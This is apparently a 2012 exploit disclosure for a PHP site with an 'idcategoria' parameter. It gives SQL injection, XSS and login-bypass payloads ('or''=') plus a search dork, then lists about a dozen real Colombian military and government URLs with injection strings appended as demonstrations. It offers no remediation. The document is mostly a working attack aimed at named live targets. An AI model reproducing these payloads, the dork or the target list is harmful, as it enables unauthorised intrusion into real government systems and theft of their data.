Bypass Access Domains GOV.CO

1. # Type: php
2.  
3. ------------------- Agreement --------------------
4. [20/11/2012] - Vulnerability discovered
5. [23/11/2012] - Vendor notified Dont responsed
6. [24/11/2012] - Public disclosure
7. --------------------------------------------------
8.  
9. # Expl0it/P0c ###################
10. http://site.com/index.php?idcategoria= < Sql Vulnerability Path >
11. http://site.com/index.php?idcategoria= < Xss Vulnerability Path >
12.  
13. # Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12--
14. # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
15. # Payload/Comand/Sql=> table_schema=0x6C5F61646D696E69737475F61646D696E / table_name=0x7462261646F72706172726F717569
16.  
17.  
18.  
19. Acceso Bypass "user:password 'or''='" .gov.co .co website..BUG
20.  
21. dork inurl: index.php?idcategoria=11
22.  
23. <form method="POST" name="forma" action="index.php?idcategoria=11" class="login">
24.  
25. -> index.php?usuario='or''='&password='or''='
26.  
27. # Demo_Xss_Sql_Vulnerabilities
28. http://www.gacar.mil.co/index.php?idcategoria=1555'
29. http://www.magazinavolar.mil.co/index.php?idcategoria=71631'
30. http://www.academiahistoriaaerea.mil.co/index.php?idcategoria=71161'
31. http://www.ejercito.mil.co/index.php?idcategoria=75292'
32. http://www.cacom3.mil.co/index.php?idcategoria=73546'
33. http://www.emavi.edu.co/index.php?idcategoria=45186'
34. http://www.cacom6.mil.co/index.php?idcategoria=1578'
35. http://www.cacom5.mil.co/index.php?idcategoria=76232'
36. http://www.cacom2.mil.co/index.php?idcategoria=72296'
37. http://www.cuartadivision.mil.co/index.php?idcategoria=218574'
38. http://www.ingenierosmilitares.mil.co/index.php?idcategoria=286047'